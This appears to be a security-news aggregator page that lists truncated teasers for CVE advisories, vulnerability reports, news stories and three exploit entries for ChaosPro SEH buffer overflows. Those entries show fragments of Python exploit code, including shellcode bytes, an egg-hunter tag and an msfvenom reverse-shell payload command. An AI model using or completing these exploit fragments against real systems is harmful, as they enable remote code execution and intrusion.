Cross site scripting
Ogma CMS 0.5 has XSS via creation of a new blog...
CVE-2019-16661
CVE-2019-16661 affects Ogma CMS 0.5 and describes an XSS vulnerability that occurs during the creation of a new blog. The connected documents do not provide specifics on the exact vector, payload, affected components, root cause, or a published remediation. Therefore, the exact nature of the flaw...
Friday Squid Blogging: Piglet Squid
Another piglet squid video. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Chun brother technology blog team easy enterprise show integration 70C scene show source code system has SQL injection vulnerabilities
The Chun brother technology blog team is committed to sharing website-building technology, WeChat development technology, custom-developed business source code systems, and custom-developed enterprise websites. It serves small and medium-sized webmasters and enterprises as a technology-based independent...
Chun technical blog team easy enterprise show integration 70C scene show source code system has unauthorized access vulnerability
The Chun brother technology blog team is committed to sharing website-building technology, WeChat development technology, custom-developed business source code systems, and custom-developed enterprise websites. It serves small and medium-sized webmasters and enterprises as a technology-based independent...
CVE-2019-10073
The "Blog", "Forum", and "Contact Us" screens of the template "ecommerce" application bundled in Apache OFBiz are vulnerable to stored XSS attacks. Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16.11: 1858438, 1858543, 1860595 and 1860616...
The Windows 10 Privacy Settings You Should Check Right Now
Whether you're new to Windows 10 or have been using it for years, take a minute to lock down your privacy...
Friday Squid Blogging: Squid Perfume
It's not perfume for squids. Nor is it perfume made from squids. It's a perfume called Squid, "inspired by life in the sea." As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Why 'Zero Day' Android Hacking Now Costs More Than iOS Attacks
Brokers of so-called zero day exploits are paying out more for Android than iOS—which would have been unthinkable until recently...
ChaosPro 3.1 SEH Buffer Overflow
!C:\Python27\python.exe Title : ChaosPro 3.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" the payload payload +=...
ChaosPro 2.0 SEH Buffer Overflow
!C:\Python27\python.exe Title : ChaosPro 2.0 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 =...
ChaosPro 2.1 - SEH Buffer Overflow
!C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp...
BlockDev Sp. Z o.o: Wordpress users disclosure on blog.makerdao.con
Wordpress users disclosure on blog.makerdao.con...
A Hack to Steal a Tesla, a Yelp Overhaul, and More News
Catch up on the most important news from today in two minutes or less...
Beers with Talos Ep. #59: The tardy episode
Beers with Talos BWT Podcast episode No. 59 is now available. Download this episode and subscribe to Beers with Talos: If iTunes and Google Play aren't your thing, click here. Recorded 8/2/19 - Yes, I know what today’s date is. We got really busy last week and I am sorry that the podcast is late...
Microsoft Releases Security Updates to Address Remote Code Execution Vulnerabilities
Microsoft has released security updates to address two remote code execution vulnerabilities, CVE-2019-1181 and CVE-2019-1182, in the following operating systems: Windows 7 SP1, Windows Server 2008 R2 SP1, Windows Server 2012, Windows 8.1, Windows Server 2012 R2, Windows 10, Windows Server 2016, Windows...
CVE-2019-1181
creationtimestamp | type | source
---|---|---
2019-08-13 05:00:00+00:00 | seen | https://msrc.microsoft.com/blog/2019/08/patch-new-wormable-vulnerabilities-in-remote-desktop-services-cve-2019-1181-1182/
2019-08-13 23:12:13+00:00 | seen | https://t.me/cybershit/558
2019-08-14 04:00:00+00:00 | seen | ...
Simple 301 Redirects Addon Bulk Uploader <= 1.2.4 - Multiple Issues
Unauthenticated option changes vulnerability that could allow an attacker to redirect all pages and posts of the blog to a malicious website, as well as an authenticated options export/deletion vulnerability...
Friday Squid Blogging: Sinuous Asperoteuthis Mangoldae Squid
Great video of the Sinuous Asperoteuthis Mangoldae Squid. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...